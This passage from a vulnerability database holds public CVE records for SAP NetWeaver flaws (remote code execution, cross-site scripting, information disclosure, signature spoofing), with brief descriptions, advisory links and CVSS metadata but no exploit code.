"datePublic": "2012-05-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-08-18T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2611",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1687910",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027052"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2611",
"datePublished": "2012-05-15T01:00:00",
"dateReserved": "2012-05-10T00:00:00",
"dateUpdated": "2024-08-06T19:42:30.660Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6816
Vulnerability from cvelistv5
Published
2013-11-19 19:00
Modified
2024-08-06 17:46
Severity ?
EPSS score ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDumpService and (2) DataCollector servlets in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1828801 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/55777 | third-party-advisory, x_refsource_SECUNIA | |
| https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/ | x_refsource_MISC | |
| https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/ | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:46:23.731Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1828801"
},
{
"name": "55777",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/55777"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-11-01T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDumpService and (2) DataCollector servlets in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1828801"
},
{
"name": "55777",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/55777"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6816",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDumpService and (2) DataCollector servlets in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1828801",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1828801"
},
{
"name": "55777",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/55777"
},
{
"name": "https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/"
},
{
"name": "https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6816",
"datePublished": "2013-11-19T19:00:00",
"dateReserved": "2013-11-19T00:00:00",
"dateUpdated": "2024-08-06T17:46:23.731Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-5372
Vulnerability from cvelistv5
Published
2017-01-23 21:00
Modified
2024-08-05 14:55
Severity ?
EPSS score ?
Summary
The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908.
References
| ▼ | URL | Tags |
|---|---|---|
| https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/ | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2017/Jan/50 | mailing-list, x_refsource_FULLDISC | |
| http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html | x_refsource_MISC | |
| https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/ | x_refsource_MISC | |
| http://www.securityfocus.com/bid/93504 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T14:55:35.809Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
},
{
"name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2017/Jan/50"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
},
{
"name": "93504",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/93504"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-10-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
},
{
"name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2017/Jan/50"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
},
{
"name": "93504",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/93504"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-5372",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
},
{
"name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2017/Jan/50"
},
{
"name": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
},
{
"name": "93504",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/93504"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-5372",
"datePublished": "2017-01-23T21:00:00",
"dateReserved": "2017-01-13T00:00:00",
"dateUpdated": "2024-08-05T14:55:35.809Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-2817
Vulnerability from cvelistv5
Published
2015-04-01 14:00
Modified
2024-08-06 05:24
Severity ?
EPSS score ?
Summary
The SAP Management Console in SAP NetWeaver 7.40 allows remote attackers to obtain sensitive information via the ReadProfile parameters, aka SAP Security Note 2091768.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/132359/SAP-Management-Console-Information-Disclosure.html | x_refsource_MISC | |
| https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/ | x_refsource_MISC | |
| http://www.securityfocus.com/bid/73705 | vdb-entry, x_refsource_BID | |
| http://www.securityfocus.com/archive/1/535829/100/800/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://seclists.org/fulldisclosure/2015/Jun/65 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T05:24:38.822Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/132359/SAP-Management-Console-Information-Disclosure.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/"
},
{
"name": "73705",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/73705"
},
{
"name": "20150625 [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/535829/100/800/threaded"
},
{
"name": "20150623 ERPSCAN Research Advisory [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2015/Jun/65"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-03-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The SAP Management Console in SAP NetWeaver 7.40 allows remote attackers to obtain sensitive information via the ReadProfile parameters, aka SAP Security Note 2091768."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/132359/SAP-Management-Console-Information-Disclosure.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/"
},
{
"name": "73705",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/73705"
},
{
"name": "20150625 [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/535829/100/800/threaded"
},
{
"name": "20150623 ERPSCAN Research Advisory [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2015/Jun/65"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-2817",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The SAP Management Console in SAP NetWeaver 7.40 allows remote attackers to obtain sensitive information via the ReadProfile parameters, aka SAP Security Note 2091768."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/132359/SAP-Management-Console-Information-Disclosure.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/132359/SAP-Management-Console-Information-Disclosure.html"
},
{
"name": "https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/"
},
{
"name": "73705",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/73705"
},
{
"name": "20150625 [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/535829/100/800/threaded"
},
{
"name": "20150623 ERPSCAN Research Advisory [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2015/Jun/65"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-2817",
"datePublished": "2015-04-01T14:00:00",
"dateReserved": "2015-04-01T00:00:00",
"dateUpdated": "2024-08-06T05:24:38.822Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-8587
Vulnerability from cvelistv5
Published
2014-11-04 15:00
Modified
2024-09-16 20:17
Severity ?
EPSS score ?
Summary
SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://service.sap.com/sap/support/notes/2067859 | x_refsource_CONFIRM | |
| http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/ | x_refsource_MISC | |
| https://twitter.com/SAP_Gsupport/status/522401681997570048 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/57606 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T13:25:59.938Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://service.sap.com/sap/support/notes/2067859"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://twitter.com/SAP_Gsupport/status/522401681997570048"
},
{
"name": "57606",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/57606"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2014-11-04T15:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://service.sap.com/sap/support/notes/2067859"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://twitter.com/SAP_Gsupport/status/522401681997570048"
},
{
"name": "57606",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/57606"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-8587",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://service.sap.com/sap/support/notes/2067859",
"refsource": "CONFIRM",
"url": "http://service.sap.com/sap/support/notes/2067859"
},
{
"name": "http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/",
"refsource": "MISC",
"url": "http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/"
},
{
"name": "https://twitter.com/SAP_Gsupport/status/522401681997570048",
"refsource": "CONFIRM",
"url": "https://twitter.com/SAP_Gsupport/status/522401681997570048"
},
{
"name": "57606",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/57606"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-8587",
"datePublished": "2014-11-04T15:00:00Z",
"dateReserved": "2014-11-04T00:00:00Z",
"dateUpdated": "2024-09-16T20:17:25.356Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-6185
Vulnerability from cvelistv5
Published
2020-02-12 19:56
Modified
2024-08-04 08:55
Severity ?
EPSS score ?
Summary
Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/2880869 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |||||
|---|---|---|---|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver (SAP Basis) |
Version: = 7.40 |
||||
|
|||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T08:55:22.130Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2880869"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver (SAP Basis)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "= 7.40"
}
]
},
{
"product": "SAP S/4HANA (SAP Basis)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "= 7.50"
},
{
"status": "affected",
"version": "= 7.51"
},
{
"status": "affected",
"version": "= 7.52"
},
{
"status": "affected",
"version": "= 7.53"
},
{
"status": "affected",
"version": "= 7.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Stored Cross Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-12T19:56:20",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2880869"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2020-6185",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (SAP Basis)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.40"
}
]
}
},
{
"product_name": "SAP S/4HANA (SAP Basis)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.50"
},
{
"version_name": "=",
"version_value": "7.51"
},
{
"version_name": "=",
"version_value": "7.52"
},
{
"version_name": "=",
"version_value": "7.53"
},
{
"version_name": "=",
"version_value": "7.54"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability."
}
]
},
"impact": {
"cvss": {
"baseScore": "5.4",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Stored Cross Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2880869",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2880869"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2020-6185",
"datePublished": "2020-02-12T19:56:20",
"dateReserved": "2020-01-08T00:00:00",
